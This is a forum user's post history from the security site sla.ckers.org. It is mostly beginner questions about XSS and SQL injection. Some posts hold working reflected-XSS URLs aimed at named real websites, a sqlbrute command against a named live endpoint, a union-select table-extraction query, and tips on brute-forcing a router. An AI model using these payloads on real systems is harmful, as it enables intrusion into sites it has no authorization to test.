Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
This group should mostly be dealing with how web applications enable networking security issues that are otherwise not there. Everything is being tunneled over port 80 now so what does that enable and how do we fix it? 

Current Page: 1 of 1
Results 1 - 19 of 19
5 years ago
cAs
I got a flashback: A few weeks ago a guy from MS visited our company and did a talk about IIS. The table is pretty identical to the one he showed us - but he had another point telling us that the Community of IIS is way better than the one of Apache.
Forum: News and Links
5 years ago
cAs
PaPPy Wrote: ------------------------------------------------------- > doesnt seem to work under FF, but does under IE7 Hm, works fine for me: http://img149.imageshack.us/img149/6585/capturemzu.jpg
Forum: Full Disclosure
5 years ago
cAs
Don't know if it fits in here: http://search.nasa.gov/search/advSearch.jsp?start=&filter=0&spell=&nasaInclude=&qx=&qt=all&qm=anywhere&dt=at&recPerPg=10&dtype=on&dn1=%22+onclick%3D%22javascript%3Aalert(%27SpiderPig,%20Spiderpig,%20does%20whatever%20a%20Spiderpig%20does...%27)%3B%22&dn=%22&displayFormat=detail You have to click the textfield near
Forum: Full Disclosure
5 years ago
cAs
archiv.bundestag http://archiv.bundestag.t-bn.de/Archiv/servlets/Rede/List?q.zuname=%3Cscript%3Ealert(%27xss%27)%3B%3C%2Fscript%3E&q.vorname=&q.fraktion=&q.sitzung=&q.wahlperiode=&q.vonTag=TT.MM.JJJJ&q.bisTag=TT.MM.JJJJ&q.top=&q.run=Suchen
Forum: Full Disclosure
5 years ago
cAs
Hm. Since it's version4 i tried to guess some tables - without success. I tried using sqlbrute but my syntax is wrong?! python sqlbrute.py --data "id=120992'" --database rs_aktuality http://www.aktuality.sk/service/ajax/galeria.php
Forum: SQL and Code Injection
5 years ago
cAs
walltime Wrote: ------------------------------------------------------- > hi, yes with the command limit > > > www.vulnerable_host.com?id=1234 union all select > 1,2,substr(group_concat(table_name),1000,300),4,5, > 6,7,8,9 from information_schema.tables/* > > it works with limit 1,300 300,400 ... and i see > it's cut after 1000, i can't see after 1000. I
Forum: SQL and Code Injection
5 years ago
cAs
@lightos: Thx, exactly what i needed.
Forum: SQL and Code Injection
5 years ago
cAs
Hi, i got the following problem: I found a sql injection and tried to extract the tables and used the following query: www.vulnerable_host.com?id=1234%20union%20all%20select%201,2,group_concat(table_name),4,5,6,7,8,9%20from%20information_schema.tables/* But now the output seems to be to long to get printed so i only get some of the results and the rest is cut. Is there a way to delimit
Forum: SQL and Code Injection
5 years ago
cAs
I got the same opinion as rsnake plus i think bot-protection should not influence the game-experience. I simply hate captchas stopping me from playing.
Forum: OMG Ponies
5 years ago
cAs
There are some really good books out there like "Cross Site Scripting - Attacks XSS Exploits and Defense" from Syngress. If you fully understand the theorie then simple real-world-exploiting should be no problem.
Forum: XSS Info
5 years ago
cAs
Some suggestions: - Get one of the older Upgrades and look at them, if you can recode them for your purposes - there you go. - If you only want to gain access to the router, rewriting a upgrade package is probably not the easiest thing to do. Why don't you try to sniff in the (internal) network if you're in it? Bruteforcing would be another method (disadvantage: time intense). Why do you w
Forum: Networking
5 years ago
cAs
I bought the book a few months ago and i can tell that is very good in mediate the basics AND the more advanced topics. Definatly worth a look!
Forum: Projects
5 years ago
cAs
Hi, again its me with a little problem. Im was bored and visited a local community site. I watched the DOM and found something interesting: JSON FILTER: /^\/\*-secure-([\s\S]*)\*\/\s*$/ Script Fragment: "<script[^>]*>([\S\s]*?)</script>" Is this really the filter they're using? Is it normal that they just write it into the DOM? :O cAs
Forum: XSS Info
5 years ago
cAs
@DoctorDan This is the Result: value="'&quot;test" I'm still trying..,
Forum: XSS Info
5 years ago
cAs
Hi, i need help on tricking a filter. To show you the problem i made a little input-output-table: Input:test Output:value="test" Input:"test Output:value='"test' Input:'test Output:value="'test" Input:"test" Output:value='"test"' Input:'test' Output:value="'test'" I think you can see where my problem is. Do you know any way t
Forum: XSS Info
5 years ago
cAs
Hello and thank you for your replies. @DoctorDan: I know that hostname is no property of document, and i also already found the document.location thing. I'm asking for a way to modify the variable hostname which i found in the DOM. greetings. cAs
Forum: XSS Info
5 years ago
cAs
So if an XSS hole exists you can, in most cases, inject javascript and use the existing functions for your advantages? EDIT: I just tried some more thinks and found that i could use document.location in my attacking string, so i tried manipulation the testsite-hostname by using "><script>document.hostname = 'test'</script> but it didn't work. I think im totally on
Forum: XSS Info
5 years ago
cAs
Hi, i read a few things about XSS and DOM but i don't get the relations between both. So the DOM is a Model to access data in HTML- and XML-Documents? Where's the relation to XSS? If you got a piece of code that's vulnerable to XSS Injection do you automatically got access to the DOM? If that's true what can you do with it? I remember the video of RSnake (i think) where he showed a XSS
Forum: XSS Info
5 years ago
cAs
Hi, just a quick introduction of myself. 18 years, from Germany and mainly interested in XSS these days. At the moment i'm reading "Cross Site Scripting Attack and Defense" made by Syngress but i feel that it is a more advanced book. So if you have any useful papers please let me know :) Greetings from Germany, cAs
Forum: Intro
Current Page: 1 of 1